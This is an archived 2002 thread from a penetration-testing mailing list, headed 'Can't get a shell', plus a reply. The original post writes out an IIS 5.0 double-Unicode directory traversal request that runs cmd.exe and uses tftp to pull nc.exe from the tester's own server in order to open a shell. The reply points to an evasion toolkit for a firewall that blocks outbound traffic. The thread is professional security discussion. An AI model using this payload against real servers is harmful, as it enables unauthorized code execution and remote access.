Penetration Testing mailing list archives

RE: Can't get a shell

From: "Rico Valdez" <Rico.Valdez () sri com>
Date: Thu, 11 Jul 2002 11:19:43 -0600

Find the unitools distribution. If the firewall is the issue, that should do the trick. The following link should help 
to get you going.

http://marc.theaimsgroup.com/?l=bugtraq&m=98040935006042&w=2

Good Luck!

Rico

-----Original Message-----
From: Gaziel, Avishay [mailto:agaziel () kpmg com]
Sent: Tuesday, July 09, 2002 10:33 AM
To: PEN-TEST () securityfocus com
Subject: Can't get a shell


Hi All,
Situation:
An  IIS5.0 vulnerable to unicode.("double Unicode" i.e. 
..%255c.. etc.)
IIS sitting behind a firewall.
Problem:
host/scripts/..%255c.........../winnt/system32/cmd.exe?/tftp+-
i+myserver+get
+nc.exe doesn't work
I keep getting (from my pumpkin tftp server) an error message 
saying that
there's something wrong with the variables.
another strange thing is that even if I don't get the error 
message the tftp
session will not start and will timeout, if I deny access I 
keep getting
access requests from the IIS.(Pumpkin is configured to prompt 
whenever a
download/upload starts)
What have I tried to do?
 Use
host/scripts/..%255c.........../winnt/system32/tftp.exe+-i+mys

erver+get+nc.e

xe instead of the above mentioned...doesn't   work as well.
What do I think is wrong?
The FW is blocking all udp traffic out.
What do I need?
1. Suggestions
2.Workarounds
Avishay 





**************************************************************
***************
The information in this email is confidential and may be 
legally privileged.
It is intended solely for the addressee. Access to this email 
by anyone else
is unauthorized. 

If you are not the intended recipient, any disclosure, 
copying, distribution
or any action taken or omitted to be taken in reliance on it, 
is prohibited
and may be unlawful. When addressed to our clients any 
opinions or advice
contained in this email are subject to the terms and 
conditions expressed in
the governing KPMG client engagement letter.         
**************************************************************
***************

--------------------------------------------------------------
--------------
This list is provided by the SecurityFocus Security 
Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security 
vulnerabilities please see:
https://alerts.securityfocus.com/


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Current thread:

Can't get a shell Gaziel, Avishay (Jul 11)
- RE: Can't get a shell Coral J. Cook (Jul 11)
- <Possible follow-ups>
- RE: Can't get a shell Rico Valdez (Jul 11)
- RE: Can't get a shell Jeremy Junginger (Jul 11)